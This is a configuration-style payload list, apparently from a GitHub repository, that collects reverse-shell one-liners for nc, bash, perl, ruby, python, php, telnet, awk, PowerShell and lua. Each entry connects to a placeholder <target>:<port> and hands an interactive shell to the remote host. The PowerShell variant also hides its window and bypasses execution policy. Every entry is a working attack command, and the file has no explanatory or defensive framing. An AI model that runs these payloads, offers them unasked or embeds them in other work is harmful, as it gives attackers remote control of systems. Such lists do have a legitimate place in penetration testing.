shell_list

1. [[shells]]
2. name = 'nc with -e'
3. cmd = 'nc <target> <port> -e /bin/bash'
4.  
5. [[shells]]
6. name = 'nc without -e'
7. cmd = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <target> <port> >/tmp/f'
8.  
9. [[shells]]
10. name = 'bash tcp'
11. cmd = 'bash -i >& /dev/tcp/<target>/<port> 0>&1'
12.  
13. [[shells]]
14. name = 'bash udp'
15. cmd = 'bash -i >& /dev/udp/<target>/<port> 0>&1'
16.  
17. [[shells]]
18. name = 'perl with /bin/sh'
19. cmd = "perl -e 'use Socket;$i=\"<target>\";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
20.  
21. [[shells]]
22. name = 'perl without /bin/sh'
23. cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"<target>:<port>\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
24.  
25. [[shells]]
26. name = 'perl for windows'
27. cmd = "perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"<target>:<port>\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
28.  
29. [[shells]]
30. name = 'ruby with /bin/sh'
31. cmd = "ruby -rsocket -e'f=TCPSocket.open(\"<target>\",<port>).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
32.  
33. [[shells]]
34. name = 'ruby without /bin/sh'
35. cmd = "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"<target>\",\"<port>\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
36.  
37. [[shells]]
38. name = 'ruby for windows'
39. cmd = "ruby -rsocket -e 'c=TCPSocket.new(\"<target>\",\"<port>\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
40.  
41. [[shells]]
42. name = 'python with /bin/sh'
43. cmd = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<target>\",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
44.  
45. [[shells]]
46. name = 'php with /bin/sh'
47. cmd = "php -r '$sock=fsockopen(\"<target>\",<port>);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
48.  
49. [[shells]]
50. name = 'telnet'
51. cmd = 'rm -f /tmp/p; mknod /tmp/p p && telnet <target> <port> 0/tmp/p'
52.  
53. [[shells]]
54. name = 'awk'
55. cmd = "awk 'BEGIN {s = \"/inet/tcp/0/<target>/<port>\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null"
56.  
57. [[shells]]
58. name = 'powershell'
59. cmd = 'powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<target>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
60.  
61. [[shells]]
62. name = 'lua with /bin/sh'
63. cmd = "lua -e \"require('socket');require('os');t=socket.tcp();t:connect('<target>','<port>');os.execute('/bin/sh -i <&3 >&3 2>&3');\""
64.  
65. [[shells]]
66. name = 'lua without /bin/sh (works on windows)'
67. cmd = "lua -e 'local host, port = \"<target>\", <port> local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'"
68. © 2020 GitHub, Inc.